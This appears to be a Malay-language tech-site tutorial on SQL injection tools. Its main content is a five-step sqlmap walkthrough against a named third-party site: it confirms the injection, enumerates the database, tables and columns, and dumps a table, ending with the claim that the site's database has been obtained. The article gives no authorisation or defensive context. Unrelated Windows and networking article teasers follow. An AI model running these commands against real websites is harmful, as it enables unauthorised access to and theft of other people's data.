Dalam bahagian ini, LuckyTemplates akan memperkenalkan kepada anda beberapa alatan yang digunakan untuk mengeksploitasi SQL Injection .
Pada masa ini terdapat banyak alat pengimbasan kerentanan keselamatan (termasuk suntikan SQL). Alat ini membolehkan mengesan dan mengeksploitasi kelemahan suntikan SQL dengan agak kuat. Beberapa alat eksploitasi kelemahan suntikan SQL automatik yang biasa digunakan termasuk:
Terdapat juga beberapa alatan lain yang boleh anda rujuk seperti: Netsparker, jSQL Injection, Burp, BBQSQL...
Di bawah ialah demo menggunakan Sqlmap untuk mengeksploitasi suntikan SQL asas.
Anda memuat turun Sqlmap di http://sqlmap.org/
Sqlmap ditulis dalam Python, jadi untuk menggunakan alat ini anda perlu memasang Python. Anda boleh memuat turun python di http://www.python.org/downloads/
Mula-mula anda mesti mengenal pasti tapak web sasaran, di sini saya mempunyai sasaran berikut: http://zerocoolhf.altervista.org/level1.php?id=1 (halaman ini kini telah mati).
Langkah 1 : Buka cmd dan taip arahan berikut:
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1”
sqlmap akan mengesan kelemahan sasaran dan memberikan maklumat tentang kelemahan tersebut.
Langkah 2 : Setelah kami menentukan bahawa tapak web sasaran mempunyai kerentanan suntikan SQL, kami terus mencari nama pangkalan data.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dbs
=> Pangkalan Data: my_zerocoolhf
Langkah 3 : Selepas menentukan nama pangkalan data, kami akan terus mencari nama jadual dalam pangkalan data.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --tables –D my_zerocoolhf
=> Terdapat 2 jadual dalam pangkalan data: auth dan book
Langkah 4 : Tentukan nama lajur dalam jadual
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --columns –D my_zerocoolhf –T book
=> Kenal pasti lajur dalam jadual buku: pengarang, id, harga, tajuk.
Langkah 5 : Buang data daripada jadual.
python sqlmap.py –u “http://zerocoolhf.altervista.org/level1.php?id=1” --dump –D my_zerocoolhf –T book
=> Jadi kami telah memperoleh pangkalan data laman web sasaran.
Di atas ialah demo asas menggunakan sqlmap untuk mengeksploitasi ralat suntikan SQL. Anda boleh mengetahui lebih lanjut tentang pilihan sqlmap di https://github.com/sqlmapproject/sqlmap/wiki/Usage untuk menyokong eksploitasi. Eksploit suntikan SQL.
Adakah anda melihat pemberitahuan pengaktifan Windows 10 di sudut kanan skrin? Artikel ini akan membimbing anda cara memadamkan notis permintaan hak cipta pada Windows 10.
Baru-baru ini Microsoft mengeluarkan kemas kini kumulatif terkini untuk pengguna PC Windows 10 yang dipanggil Build 14393.222. Kemas kini yang dikeluarkan untuk Windows 10 ini terutamanya membetulkan pepijat berdasarkan maklum balas pengguna dan meningkatkan pengalaman prestasi sistem pengendalian.
Adakah anda mempunyai komputer pada rangkaian tempatan anda yang memerlukan akses luaran? Menggunakan hos benteng sebagai penjaga pintu untuk rangkaian anda boleh menjadi penyelesaian yang baik.
Kadangkala anda mungkin perlu memadamkan log peristiwa lama sekaligus. Dalam panduan ini, Quantrimang.com akan menunjukkan kepada anda 3 cara untuk memadam semua log peristiwa dalam Windows 10 Event Viewer dengan cepat.
Jika anda lebih suka menggunakan papan kekunci klasik lama, seperti IBM Model M, yang tidak termasuk kekunci Windows fizikal, terdapat kaedah mudah untuk menambah lagi, dengan meminjam kunci yang anda jarang gunakan. .
WindowTop ialah alat yang mempunyai keupayaan untuk meredupkan semua tetingkap aplikasi dan program yang dijalankan pada komputer Windows 10. Atau anda boleh menggunakan antara muka latar belakang gelap pada tingkap.
Dalam banyak artikel sebelumnya, kami telah menyebut bahawa kekal tanpa nama dalam talian adalah sangat penting. Maklumat peribadi dibocorkan setiap tahun, menjadikan keselamatan dalam talian semakin diperlukan. Itulah juga sebab kita harus menggunakan alamat IP maya. Di bawah, kita akan belajar tentang kaedah untuk mencipta IP palsu!
Bar Bahasa pada Windows 8 ialah bar alat bahasa kecil yang direka untuk dipaparkan secara automatik pada skrin Desktop. Walau bagaimanapun, ramai orang ingin menyembunyikan bar bahasa ini pada Bar Tugas.
Memaksimumkan kelajuan Internet adalah penting untuk mengoptimumkan sambungan rangkaian anda. Anda boleh menikmati hiburan dan pengalaman kerja yang optimum menggunakan komputer, TV sedia Internet, konsol permainan, dsb.
Kesambungan wayarles adalah satu keperluan hari ini dan kerana itu, keselamatan wayarles adalah penting untuk memastikan keselamatan dalam rangkaian dalaman anda.
